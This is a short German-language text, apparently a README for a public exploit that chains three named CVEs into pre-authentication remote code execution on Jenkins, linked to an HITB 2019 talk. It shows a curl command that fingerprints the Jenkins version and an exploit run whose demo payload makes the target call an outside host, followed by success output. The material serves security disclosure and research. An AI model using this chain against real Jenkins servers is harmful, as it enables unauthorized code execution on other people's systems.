
Seit Mai 2017 gibt es keine Pre-Auth-RCE in Jenkins, aber das hier ist genau eine!
Es gibt seit Mai 2017 keine Pre-Auth-RCE in Jenkins, aber das hier ist sie!
Es kombiniert CVE-2018-1000861, CVE-2019-1003005 und CVE-2019-1003029 zu einer zuverlässigeren und eleganteren Pre-Auth-Remote-Code-Execution!
ANONYMOUS_READ deaktiviert
ANONYMOUS_READ aktiviert (oder mit einem normalen Benutzerkonto)
$ curl -s -I http://jenkins/| grep X-Jenkins
X-Jenkins: 2.137
X-Jenkins-Session: 20f72c2e
X-Jenkins-CLI-Port: 50000
X-Jenkins-CLI2-Port: 50000
$ python exp.py http://jenkins/ 'curl orange.tw'
[*] ANONYMOUS_READ disable!
[*] Bypass with CVE-2018-1000861!
[*] Exploit success!(it should be :P)
Einige Folien aus meinem HITB-AMS-2019-Vortrag:
